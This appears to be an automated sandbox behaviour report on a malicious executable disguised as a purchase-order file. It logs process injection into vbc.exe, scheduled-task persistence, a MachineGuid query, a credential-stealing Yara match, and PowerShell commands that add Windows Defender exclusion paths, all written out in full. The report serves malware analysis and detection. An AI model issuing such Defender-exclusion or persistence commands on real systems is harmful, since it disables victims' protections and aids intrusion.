Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtOpenKeyEx: Indirect: 0x140077B9B
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtQueryValueKey: Indirect: 0x140077C9F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtClose: Indirect: 0x140077E81
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41B000
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 422000
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 426000
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 624008
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41B000
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 422000
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 426000
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 910008
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe"
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe"
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp"
Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmp15E7.tmp"
Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F68550 GetVolumeInformationW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,9_2_00F68550
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeQueries volume information: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\System32\alg.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\AppVClient.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST9A6E.tmp VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST9A7F.tmp VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\msdtc.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe | Queries volume information: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\System32\Locator.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\SensorDataService.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\snmptrap.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\Spectrum.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\TieringEngineService.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\AgentService.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\vds.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\wbengine.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\System32\TieringEngineService.exe | Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 9_2_00F68550 GetVolumeInformationW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,9_2_00F68550
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 42.2.vbc.exe.7590f08.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8745570.7.raw.unpack, type: UNPACKEDPE
